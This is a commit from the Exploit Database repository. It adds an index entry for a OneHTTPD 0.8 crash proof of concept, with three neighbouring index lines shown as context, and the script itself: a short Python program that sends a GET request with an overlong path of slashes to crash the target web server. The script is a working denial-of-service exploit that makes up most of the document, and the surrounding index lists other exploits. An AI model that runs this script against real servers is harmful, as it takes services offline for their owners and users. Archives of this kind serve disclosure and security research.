Updated 02_10_2014

This commit is contained in:
Offensive Security 2014-02-10 04:27:38 +00:00
parent 06a84a9568
commit 97ddd98874
2 changed files with 19 additions and 0 deletions

View file

@ -28323,3 +28323,4 @@ id,file,description,date,author,platform,type,port
31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface Code Execution",2014-02-07,metasploit,hardware,remote,0
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80

Can't render this file because it is too large.

18
platforms/windows/dos/31522.py Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: onehttpd 0.8 Crash PoC
# Date: Feb 7,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 0.8
# Software Link: https://onehttpd.googlecode.com/files/onehttpd-0.8.exe
# Tested on: Windows XP SP3
# Email: m.dofo123@gmail.com
from requests import get,ConnectionError as cerror
from sys import argv
if(len(argv)!=2):
print '%s host' % argv[0]
else:
buff = '/'*245
script,host=argv
try:
get('http://'+host+':8080/'+buff)
except cerror:
exit(1)